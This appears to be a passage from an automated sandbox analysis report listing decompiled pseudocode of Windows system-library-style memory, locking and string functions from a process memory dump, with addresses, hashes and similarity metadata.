				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E050BA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x050ba61c
0x050ba61e
0x050ba623
0x050ba628
0x050ba62b
0x050ba62d
0x050ba648
0x050ba64a
0x050ba64f
0x050f9b44
0x050ba6ec
0x050ba6f1
0x050ba6f1
0x050ba655
0x050ba657
0x050ba65a
0x050ba65d
0x050ba662
0x050ba663
0x050ba667
0x050ba668
0x050ba66d
0x050ba706
0x050ba706
0x050f9bda
0x050f9be6
0x050f9beb
0x00000000
0x050f9beb
0x050ba679
0x050f9b7a
0x00000000
0x050f9b7a
0x050ba683
0x050ba6f4
0x050ba6f7
0x050ba6f9
0x050ba6fd
0x050ba6a0
0x050ba6a0
0x050ba6ad
0x050ba6af
0x050ba6b4
0x050f9ba7
0x050f9bac
0x00000000
0x00000000
0x050f9bc6
0x050f9bce
0x050f9bd1
0x050f9bd3
0x050f9bd3
0x00000000
0x050f9bd1
0x050ba6bd
0x050ba6c3
0x050ba6c6
0x050ba6d2
0x050ba701
0x050ba704
0x00000000
0x050ba704
0x050ba6d4
0x050ba6d6
0x050ba6d9
0x050ba6db
0x050ba6e1
0x050ba6e6
0x050ba6e8
0x050ba6e8
0x050ba6ea
0x00000000
0x050ba6ea
0x050ba688
0x050ba692
0x050ba694
0x050ba699
0x00000000
0x00000000
0x050ba69d
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012b8c95c0e46ea4225dfad9f5aa6f9f2dfb2ce8c3560336909414e7ea87be0f
Instruction ID: bc626c2162492f16dedaa913d5c55e6f6f001850fff7dfc438a9c48ed6437278
Opcode Fuzzy Hash: 012b8c95c0e46ea4225dfad9f5aa6f9f2dfb2ce8c3560336909414e7ea87be0f
Instruction Fuzzy Hash: 43417BB5B04209DFDB15CF58E990BADBBF2FB49300F15806AE905AB384D7B4A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 050AC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E050AC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E050A7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05158D34(_v8, _t80);
					}
					E050A2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0509FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05158833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0509FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E050CB180();
						if(_a4 != 0) {
							E050A2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E050ABB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E050ABB2D(_t16, _t15);
						E050AB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0509FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0509FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0509FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x050ac18d
0x050ac18f
0x050ac191
0x050ac19b
0x050ac1a0
0x050ac1d4
0x050ac1de
0x050f2d6e
0x050ac1e4
0x050ac1e4
0x050ac1e4
0x050ac1ec
0x050f2d7d
0x050f2d7d
0x050ac1f3
0x050ac1ff
0x050f2d88
0x050f2d8d
0x050f2d94
0x050f2d94
0x050f2d9f
0x050f2da4
0x050f2dab
0x050f2db0
0x050f2db2
0x050f2db3
0x050f2db4
0x050f2dbc
0x050f2dc3
0x050f2dc3
0x050ac205
0x050ac205
0x050ac208
0x050ac20e
0x050ac211
0x050ac216
0x050ac219
0x050ac21f
0x050ac222
0x050ac22c
0x050ac234
0x050ac23a
0x050ac23f
0x050ac245
0x050ac24b
0x050ac251
0x050ac25a
0x050ac276
0x050ac27d
0x050ac27d
0x050ac25c
0x050ac25c
0x00000000
0x050ac25e
0x050ac1a4
0x050ac1aa
0x050ac1b3
0x050ac265
0x050ac26c
0x050ac26c
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 837518e0e4a7efcbed01162f24199f9b9627f7772b2ce56316b6b80046e14ae1
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 42311473B0558ABEEB05EBF4E894BEDF795BF52200F08815AD41C87201DB386A15D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05107016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05107016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x517d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05106B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05106B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E050A7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E050C9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E050CB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L050A4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x05107016
0x0510701e
0x0510702b
0x05107033
0x05107037
0x0510703c
0x0510703e
0x05107041
0x05107045
0x0510704a
0x05107050
0x05107055
0x0510705a
0x05107062
0x05107062
0x0510705a
0x05107064
0x05107064
0x05107067
0x05107071
0x05107096
0x0510709b
0x051070a2
0x051070a6
0x051070a7
0x051070ad
0x051070b3
0x051070b6
0x051070bb
0x051070c3
0x051070c3
0x051070c6
0x051070cd
0x051070dd
0x051070e0
0x051070e2
0x051070e2
0x051070ee
0x05107101
0x051070f0
0x051070f9
0x051070f9
0x0510710a
0x0510710e
0x05107112
0x05107117
0x05107118
0x05107118
0x051070bb
0x0510711d
0x05107123
0x05107131
0x05107131
0x05107136
0x0510713d
0x0510713e
0x0510713f
0x0510714a
0x0510714a
0x05107084
0x05107088
0x00000000
0x0510708e
0x0510708e
0x05107092
0x00000000
0x05107092

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959b76951350540cd7942a6d192f24922946dfc061c9bb37a7ca175a99199f73
Instruction ID: be3efdbfec0a58e31903759400f6e54339eb4719b920c477feb9b707f02395a2
Opcode Fuzzy Hash: 959b76951350540cd7942a6d192f24922946dfc061c9bb37a7ca175a99199f73
Instruction Fuzzy Hash: 2C31B3726087919BC321DF68D940AAFB7E9FF88700F044A29F896876D0E770E914C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 050BA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E050BA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x5177b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x5177b10 = 8;
					 *0x5177b14 = 0x5177b0c;
					 *0x5177b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E050BA990(0x5177b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L050BA840(__edx, __ecx, __ecx, _t52, 0x5177b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x5177b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x5177b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x5177b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L050A4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x5177b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E050CF3E0(_t50,  *0x5177b14, _t8 >> 3);
						_t28 =  *0x5177b14; // 0x77f07b0c
						__eflags = _t28 - 0x5177b0c;
						if(_t28 != 0x5177b0c) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x5177b14 = _t50;
						_t48 = _v12;
						 *0x5177b10 = _t9;
						goto L6;
					}
					 *0x5177b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x050ba713
0x050ba714
0x050ba717
0x050ba71d
0x050ba720
0x050ba722
0x050ba727
0x050ba74a
0x050ba754
0x050ba75e
0x050ba768
0x050ba76a
0x050ba773
0x050ba78b
0x050ba790
0x050ba792
0x050ba741
0x050ba741
0x050ba743
0x050ba749
0x050ba749
0x050ba732
0x050ba73a
0x050ba797
0x050ba79d
0x050ba7a3
0x050ba7a9
0x050ba7b6
0x050ba7bc
0x050ba7ca
0x050ba7e0
0x050ba7e2
0x050ba7e4
0x050f9bf2
0x00000000
0x050f9bf2
0x050ba7ed
0x050ba7f2
0x050ba800
0x050ba805
0x050ba80d
0x050ba812
0x050f9c08
0x050f9c08
0x050ba818
0x050ba81b
0x050ba821
0x050ba824
0x00000000
0x050ba824
0x050ba7ae
0x00000000
0x050ba7ae
0x050ba73c
0x050ba73e
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba15b188fba634dfe84a6db53e28982ab55e367cb2ebfb926849c0788be9ad2
Instruction ID: 258ccad01abe3abf79749d84e3d618867e918614944410d8931ab3ca5f33e079
Opcode Fuzzy Hash: 7ba15b188fba634dfe84a6db53e28982ab55e367cb2ebfb926849c0788be9ad2
Instruction Fuzzy Hash: 8D316BB1724209ABE711CB1CFDC1FA97BFAFB84610F14495AE105972C1DBB09981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 050B61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E050B61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E050B5E50(0x50667cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05159D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0508F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x050b61b3
0x050b61b5
0x050b61bd
0x050b61c3
0x050b61c7
0x050b61d2
0x050b61ff
0x050b61ff
0x050b6201
0x050b6207
0x050b6207
0x050b61d4
0x050b61d9
0x00000000
0x00000000
0x050b61df
0x050b61e2
0x00000000
0x00000000
0x050b61e6
0x050b61e8
0x050b61ee
0x050b61ee
0x050b61f9
0x050f762f
0x050f7632
0x050f7635
0x050f7639
0x050f7640
0x050f766e
0x050f7675
0x00000000
0x00000000
0x050f7681
0x050f7689
0x050f768d
0x050f7691
0x050f7695
0x050f7699
0x050f76af
0x050f76b5
0x050f76b7
0x050f76b7
0x050f76d7
0x050f76dc
0x00000000
0x050f76dc
0x050f76a2
0x050f76a9
0x050f7651
0x050f7653
0x050f7653
0x050f7656
0x050f7656
0x00000000
0x050f7656
0x050f7644
0x050f7646
0x050f7648
0x050f7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407432c308af803da1614455c5d89194bcdc99fd6877fa905a5765833ccc2068
Instruction ID: a0b252152f7b8698646a352ceac7c511724bb42f72bc5a490f9e09eea7670e58
Opcode Fuzzy Hash: 407432c308af803da1614455c5d89194bcdc99fd6877fa905a5765833ccc2068
Instruction Fuzzy Hash: C131AD716097018FE7A0CF19D940B6EB7E5FB88B00F08496DE9999B751E7B1E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0508AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0508AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x517d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x5177b9c; // 0x0
					_t53 = L050A4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E050CB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E050CF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L05096C59(_t53, _t51, _t58) != 0) {
							_t28 = E050B5E50(0x506c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E050BB230(_v32, _v28, 0x506c2d8, 1,  &_v24);
								_t28 = E0508F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0508aa25
0x0508aa29
0x0508aa2d
0x0508aa30
0x0508aa37
0x0508aa3c
0x050e4458
0x050e4458
0x050e4472
0x050e4474
0x050e4476
0x0508aa64
0x0508aa74
0x050e447c
0x050e4483
0x050e4492
0x0508aa52
0x0508aa54
0x0508aa5e
0x050e44a8
0x050e44ad
0x050e44af
0x050e44b6
0x050e44b6
0x050e44b9
0x050e44bc
0x050e44cd
0x050e44d3
0x050e44d6
0x050e44e1
0x050e44e1
0x050e44e6
0x050e44e8
0x050e44fb
0x050e44fb
0x050e44e8
0x00000000
0x0508aa5e
0x050e4476
0x0508aa42
0x0508aa46
0x0508aa48
0x0508aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d082967e63be88609abf32c086ccf80c8252412951917d68383decdc76a16e
Instruction ID: 858547f897f47f1399f5bd4796b4b11612bf9f1a21440ad83420213dec4fa246
Opcode Fuzzy Hash: 72d082967e63be88609abf32c086ccf80c8252412951917d68383decdc76a16e
Instruction Fuzzy Hash: A731C2B1B00219ABDF15AF64ED81EBFB7B9FF54700B11406AF841EB140E7749910DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050C4A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E050C4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x517d360 ^ _t62;
				_v8 =  *0x517d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E050A2280(_t26, 0x5178608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0509FFB0(_t41, _t51, 0x5178608);
						L2:
						 *0x517b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E050CB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E050A2280(_t28, 0x5178608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0509FFB0(_t42, _t53, 0x5178608);
							if(_t53 != 0) {
								L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0509FFB0(_t41, _t51, 0x5178608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x050c4a2c
0x050c4a34
0x050c4a3c
0x050c4a3e
0x050c4a48
0x050c4a4b
0x050c4a4d
0x050c4a51
0x050c4a9c
0x00000000
0x00000000
0x050c4aa3
0x050c4aa8
0x050c4aad
0x050c4ab1
0x050c4ade
0x050c4ae3
0x050c4a5a
0x050c4a62
0x050c4a6a
0x050c4a6e
0x050ff203
0x050c4a84
0x050c4a88
0x050c4a89
0x050c4a8a
0x050c4a95
0x050c4a95
0x050c4a79
0x050c4a80
0x050c4af2
0x050c4af4
0x050c4af9
0x050c4aff
0x050c4b01
0x050c4b03
0x050c4b08
0x050ff20a
0x050ff212
0x050ff216
0x050ff216
0x050c4b08
0x050c4b13
0x050c4b1a
0x050ff229
0x050ff229
0x050c4b1a
0x050c4a82
0x00000000
0x050c4a82
0x050c4ab7
0x050c4acd
0x050c4acd
0x050c4ad5
0x050c4ada
0x00000000
0x050c4ada
0x050c4ac2
0x050c4acb
0x00000000
0x00000000
0x00000000
0x050c4acb
0x050c4a53
0x050c4a53
0x050c4a58
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d067014b2a7a0a6cdb3b479835430a65a7959fcca799ad5d83177f8bd90c17
Instruction ID: 4a98188bd34935a0f18cf5c538c2aff9b807e707113b3471435e9b5dfc6fccff
Opcode Fuzzy Hash: 11d067014b2a7a0a6cdb3b479835430a65a7959fcca799ad5d83177f8bd90c17
Instruction Fuzzy Hash: CD310432205655ABCB61DF58E959B6EBFF6FF82B12F0044ADF95647640CB70D800CB85

Uniqueness

Uniqueness Score: -1.00%

Function 050C8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E050C8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x517d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E050B4E70(0x51786e4, 0x50c9490, 0, 0);
					if( *0x51753e8 > 5 && E050C8F33(0x51753e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x51753e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x51753e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x506bc46;
						_t48 = E05107B9C(0x51753e8, 0x506bc46, _t67, 0x51753e8, _t70,  &_v140);
					}
				}
				return E050CB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x050c8ec7
0x050c8ed9
0x050c8edc
0x050c8ee6
0x050c8ee9
0x050c8eee
0x050c8efc
0x050c8f08
0x05101349
0x05101353
0x0510135d
0x05101366
0x0510136f
0x05101375
0x0510137c
0x05101385
0x05101390
0x05101391
0x0510139c
0x0510139d
0x051013a6
